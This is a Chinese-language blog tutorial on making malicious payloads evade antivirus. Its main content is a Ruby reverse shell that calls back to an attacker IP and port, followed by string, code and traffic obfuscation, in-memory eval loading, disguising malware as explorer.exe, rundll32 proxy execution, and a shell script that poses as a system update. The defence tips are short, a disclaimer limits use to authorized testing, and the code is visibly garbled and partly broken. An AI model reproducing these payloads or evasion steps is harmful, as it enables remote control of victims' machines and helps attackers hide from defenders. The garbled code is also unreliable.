0x01 魔改载荷：从新闻事件说起

近期，一家大型科技公司的安全团队发现其网络中存在多起未授权的访问事件。深入调查后，他们确认这是利用恶意载荷免杀技术的攻击者所为。攻击者巧妙地绕过了企业的防御系统，成功植入恶意软件并在内网横行数月。今天，我们将深入探讨这些攻击者是如何做到这一切的。

恶意载荷免杀（Payload Evasion）是一种通过修改或包装恶意代码使其绕过杀毒软件和其他安全检测的技术。随着安全检测技术的不断进步，攻击者也在不断创新，以便其恶意载荷能够有效地逃避检测。本文将详细讲解如何使用Ruby和Shell脚本实现恶意载荷的免杀。

0x02 环境搭建实验室

在开始之前，我们需要搭建一个实验室环境，以便测试我们的免杀技巧。

实验室需求：

• 攻击者主机：一台运行Kali Linux的虚拟机，用于开发和测试恶意载荷。
• 目标主机：一台运行Windows的虚拟机，安装常见的杀毒软件，以测试免杀效果。
• 本地网络：用于模拟内网环境。

实验室搭建步骤：

1. 安装Kali Linux：在VirtualBox或VMware中安装Kali Linux，并确保系统更新到最新版本。
2. 安装Windows虚拟机：在虚拟环境中安装Windows操作系统，并安装几款流行的杀毒软件（如Defender，McAfee等）。
3. 网络配置：确保Kali和Windows虚拟机在同一网络中，以便Kali能够直接与Windows通信。

准备好实验室后，我们即可开始编写免杀载荷代码。

0x03 Payload构造的艺术

为了有效地逃避检测，我们需要对原始载荷进行一定的修改。通常的恶意载荷在编译后具有一系列特征，这些特征容易被杀毒软件识别。我们的目标就是通过修改这些特征来达到免杀的目的。

Ruby实现恶意载荷

我们将使用Ruby语言来编写一个简单的反向Shell载荷。Ruby的灵活性和强大的字符串处理能力使其成为编写绕过杀软代码的优秀选择。

<pre><code class="language-ruby">require &#039;socket&#039;

host = &#039;192.168.1.10&#039; # 攻击者的IP port = 4444 # 攻击者监听的端口

begin socket = TCPSocket.new(host, port) loop do command = socket.gets.chomp break if command == &#039;exit&#039; result = #{command} socket.puts result end rescue

如果出错了，先啥也不干，等会再试

sleep 5 retry end</code></pre>

这个简单的Ruby脚本打开一个到攻击者的TCP连接，并等待命令执行。为了免杀，我们需要进一步“魔改”这个原始载荷。

魔改技巧

1. 字符串混淆：将可识别的字符串使用base64或其他方式进行编码。

<pre><code class="language-ruby">encoded_command = Base64.encode64(&#039;net user&#039;) decoded_command = Base64.decode64(encoded_command)

result = #{decoded_command}</code></pre>

1. 代码混淆：将关键逻辑使用函数调用和变量重命名进行隐藏。

<pre><code class="language-ruby">def execute(command) result = #{command} return result end

command = &#039;ipconfig&#039; puts execute(command)</code></pre>

1. 流量混淆：对流量进行加密或伪装。

<pre><code class="language-ruby">require &#039;openssl&#039;

aes = OpenSSL::Cipher::AES256.new(:CBC) aes.encrypt aes.key = &#039;a&#039;*32 # 32字节密钥

encrypted_command = aes.update(&#039;ipconfig&#039;) + aes.final</code></pre>

通过以上方法，我们可以在一定程度上隐藏我们的恶意载荷特征，使其在杀毒软件检测中更为隐蔽。

0x04 绕过检测的秘密

成功的免杀不仅仅依赖于对载荷的修改，还需要在网络通信和系统调用层面进行伪装。这里，我们将介绍几种常用的免杀技巧。

常用绕过技术

1. 内存加载：将恶意载荷直接加载到内存中，避免在磁盘中留下痕迹。

<pre><code class="language-ruby">load_path = &quot;path/to/your/payload&quot; payload = File.read(load_path)

eval(payload)</code></pre>

1. 伪装合法进程：将恶意进程伪装成系统或常用软件的进程。

<pre><code class="language-shell"># 将恶意程序伪装成explorer.exe进程 mv malware.exe explorer.exe</code></pre>

1. 利用白名单程序：将恶意代码注入到白名单程序中执行。

<pre><code class="language-shell"># 使用合法程序载入我们的恶意代码 rundll32.exe shell32.dll,Control_RunDLL &quot;path/to/your/payload&quot;</code></pre>

Shell脚本增强版

使用Shell脚本来进一步伪装和隐藏载荷执行的行为：

<pre><code class="language-shell">#!/bin/bash

伪装成系统更新脚本

echo &quot;Starting system update...&quot; sleep 2

实际上在执行恶意载荷

payload=&quot;/tmp/malicious_payload.sh&quot; bash $payload</code></pre>

以上技巧结合使用，能显著提升恶意载荷的隐蔽性，大幅增加被检测的难度。

0x05 撕下面具：检测与防御

尽管攻击者有多种手段逃避检测，但作为防御者，我们也有相应的策略来应对这些威胁。

检测技术

1. 行为分析：通过分析进程行为、内存异常、网络行为等特征来检测恶意载荷。
2. 沙盒执行：在隔离环境中执行可疑文件，观察其行为。
3. 端点检测与响应（EDR）：实时监控端点活动，以迅速识别和响应威胁。

防御建议

1. 定期更新杀毒软件：确保使用最新的病毒库和检测引擎。
2. 启用系统安全策略：限制未知程序的执行，启用执行策略等。
3. 网络分段：限制内网横向移动，降低攻击面。

0x06 红队思维：个性化攻防经验

作为一名红队成员，我常常在攻防演练中思考如何更好地绕过目标的防御。以下是一些切身的经验分享：

• 熟悉环境：在攻击之前，尽可能多地收集目标环境的信息。这将在后续攻击步骤中起到关键作用。
• 灵活运用工具：不同的目标需要不同的工具和技术，灵活使用多种攻击工具和脚本能够显著提高成功率。
• 持久化手段：成功进入目标系统后，优先考虑如何持久化，确保即便被检测到也能迅速恢复访问。

在不断变化的攻防对抗中，只有不断学习、不断创新，才能在攻防演练中取得成功。希望这篇文章能够为你提供一些启发和帮助。请始终记住，本文内容仅用于授权的安全测试，任何非法用途均需自行承担法律责任。